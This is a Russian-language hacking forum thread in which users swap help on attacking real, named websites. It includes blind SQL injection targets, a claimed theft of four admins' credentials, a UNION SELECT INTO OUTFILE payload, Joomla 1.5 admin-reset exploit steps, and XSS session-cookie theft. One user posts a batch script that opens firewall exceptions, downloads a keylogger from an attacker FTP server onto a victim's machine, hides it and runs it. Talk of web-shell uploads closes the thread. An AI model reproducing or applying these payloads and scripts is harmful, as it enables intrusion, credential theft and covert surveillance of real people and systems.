Ваши вопросы по уязвимостям.

http://theictect.com/rss/daily_deal.php?c=3
вот blind inj, база mysql, в information_schema нет таблиц с юзерами, подскажите что делать? помимо inf_sch присутствуют, еще 3 базы но там тыкать бесполезно.

 

Ищи SQL в другом месте , часто бывает , что у тебя прав нету это как вариант

 

ykktbltrn'0
wkpfx}q|e+6

Что это может быть за хешь?

 

щелбан тебе по лбу !!!

 

Выдрал с 2ой базы логины и пассы 4 админов, теперь ищу админку.

 

Lijzer
http://zoupon.com.au/admin/
не оно?

 

ну и где твой вопрос по уязвимостям? модеры потрите этот бред школьника и флуд..мой пост тоже под удаление..

 

http://iatp.md/index.php?what=nav&id=-1+union+select+1,convert(version()+using+latin1),3+into+outfile+ae.txt--

подскажите пожалуйста что тут не то?

 

во первых ты должен указать полный путь к файлу, во вторых ты должен взять его в кавычки, в третих у тебя нет прав на чтение/запись файлов

 

так в этом и проблема....кавычки. не если нет прав ладно. спасибо!

 

joomla 1.5 exploit
1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm

2. Write into field "token" char ' and Click OK.

3. Write new password for admin

4. Go to url : target.com/administrator/

5. Login admin with new password


во время входа мне выдает ошибку неверный логин ???

 

Нашел xss, выполняю:

В алетре только половина кукав... И этого не достаточно что бы украсть сессию. В чем может быть проблема?

 

Наверное, некоторые куки недоступны для javascriptа, то есть они с флагом HTTP-Only

 

Значит уязвимость исправлена.

 

Столкнулся с такой проблемой. Создал батник install.bat

Code:

MKDIR C:\hc
netsh firewall add allowedprogram C:\install.bat "DownloaderFTP" enable
echo download >key.txt
echo download >>key.txt
echo get inst_jasp.exe C:\hc\inst_jasp.exe >>key.txt
echo bye >>key.txt
ftp -s:C:\key.txt "ИП АДРЕС ФТП" 
netsh firewall add allowedprogram C:\hc\inst_jasp.exe "Blaze" enable 
attrib "C:\hc" +h 
start C:\hc\inst_jasp.exe 
del key.txt 
del install.bat

Батник закачивает на комп жертвы кейлоггер с моего фтп. Если я запускаю у себя, то все норм, логи идут. А если на удаленном компе через cmd, то никаких логов нет =(
Проверил, файл на комп закачивает и вроде выполняет. Но, почему-то логов нет.

 

ANTIVIRUS+FIREWALL

 

Антивира у него нету, фаерволла тоже (кроме стандартного, но в батнике просаны исключения)

 

Подскажите пожалуйста как создать shell и как им пользоватся

 

ну дорогой задал ты вопрос, шелл что бы создать надо в пхп или в другом веб языке шарить, но я подозреваю что тебя интересует как залить шелл (аплоад на сервер)..для этого прочитай -ка сначала все маны по багам на ачате, но остановись на скулях поболее.и через пару эдак месяцев если понятливый будешь , то узнаешь что такое шелл и с чем его едят..а пока кури маны..

 

Скинул ссылку на один шелл в пм. По теме: тебе необходимо его залить на удаленный сервер, а для этого ищи уязвимости.